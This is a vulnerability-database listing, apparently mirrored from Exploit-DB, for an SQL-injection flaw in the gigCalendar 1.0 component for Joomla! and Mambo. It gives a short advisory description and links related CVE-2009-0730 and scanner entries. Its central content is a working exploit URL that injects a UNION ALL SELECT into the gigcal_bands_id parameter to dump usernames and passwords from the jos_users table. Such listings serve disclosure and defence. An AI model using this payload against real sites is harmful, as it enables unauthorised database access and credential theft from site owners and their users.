Lucene search
Salvatore FrestaEDB-ID:32807HistoryFeb 23, 2009 - 12:00 a.m.
Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection
2009-02-2300:00:00
Salvatore Fresta
www.exploit-db.com
16
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/33859/info
The gigCalendar component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
gigCalendar 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23 Related
openvas
openvas
A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability
2009-03-02 00:00:00
Joomla! and Mambo gigCalendar Component SQL Injection Vulnerability
2009-02-26 00:00:00
Joomla! and Mambo gigCalendar Component SQL Injection Vulnerability
2009-02-26 00:00:00
exploitdb
exploitdb
Joomla! Component Gigcal 1.x - 'id' SQL Injection
2009-01-18 00:00:00
prion
prion
Sql injection
2009-02-24 23:30:00
cvelist
cvelist
CVE-2009-0730
2009-02-24 23:00:00
nvd
nvd
CVE-2009-0730
2009-02-24 23:30:03
cve
cve
CVE-2009-0730
2009-02-24 23:30:03